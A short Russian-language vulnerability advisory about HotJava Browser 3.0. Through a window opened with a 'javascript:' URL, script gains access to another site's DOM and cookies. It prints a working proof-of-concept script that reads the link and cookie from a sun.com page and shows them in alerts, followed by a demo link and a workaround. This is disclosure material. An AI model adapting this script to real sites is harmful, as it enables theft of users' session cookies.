Обнаружена уязвимость в HotJava Browser 3.0, которая дает доступ к DOM программным кодам. Помимо всего прочего, это позволяет воровать cookies других посещенных сайтов.

Системы уязвимы:
HotJava Browser 3.0

Проблема имеет отношение к открытию ‘ javascript: ‘ URL в окне, которое позволяет обращаться к DOM документа в этом окне.

Эксплоит:
———hotjava-1.html——————————————
<SCRIPT>
window.open(«http://www.sun.com»,»g»);
setTimeout(«window.open(‘javascript:alert(\»The first link is:
\»+document.links[0].href);alert(\»The cookie is:
\»+document.cookie)’,’g’)»,10000);
</SCRIPT>
———————————————————————

Фиксим:
Выруби поддержку JavaScript

Демонстрация:
http://www.guninski.com/hotjava-1.html



Оставить мнение